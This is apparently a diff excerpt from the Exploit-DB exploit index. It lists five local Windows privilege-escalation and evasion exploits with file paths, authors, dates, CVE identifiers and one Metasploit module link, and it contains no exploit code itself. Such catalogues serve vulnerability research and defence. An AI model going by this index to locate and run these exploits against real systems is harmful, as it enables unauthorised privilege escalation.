 51203,exploits/windows/local/51203.txt,"Windows 11 10.0.22000 -  Backup service Privilege Escalation",2023-04-03,nu11secur1ty,local,windows,,2023-04-03,2023-04-06,0,CVE-2023-21752,,,,,
+51544,exploits/windows/local/51544.c,"Windows 11 22h2 - Kernel Privilege Elevation",2023-06-26,"Amirhossein Bahramizadeh",local,windows,,2023-06-26,2023-06-26,0,CVE-2023-28293,,,,,
 50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",2021-11-12,"Marcio Mendes",local,windows,,2021-11-12,2021-11-12,0,,,,,,
 48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows,,2020-09-16,2020-09-16,0,,,,,,
 48021,exploits/windows/local/48021.rb,"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)",2020-02-07,Metasploit,local,windows,,2020-02-07,2020-02-07,1,CVE-2018-11479,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb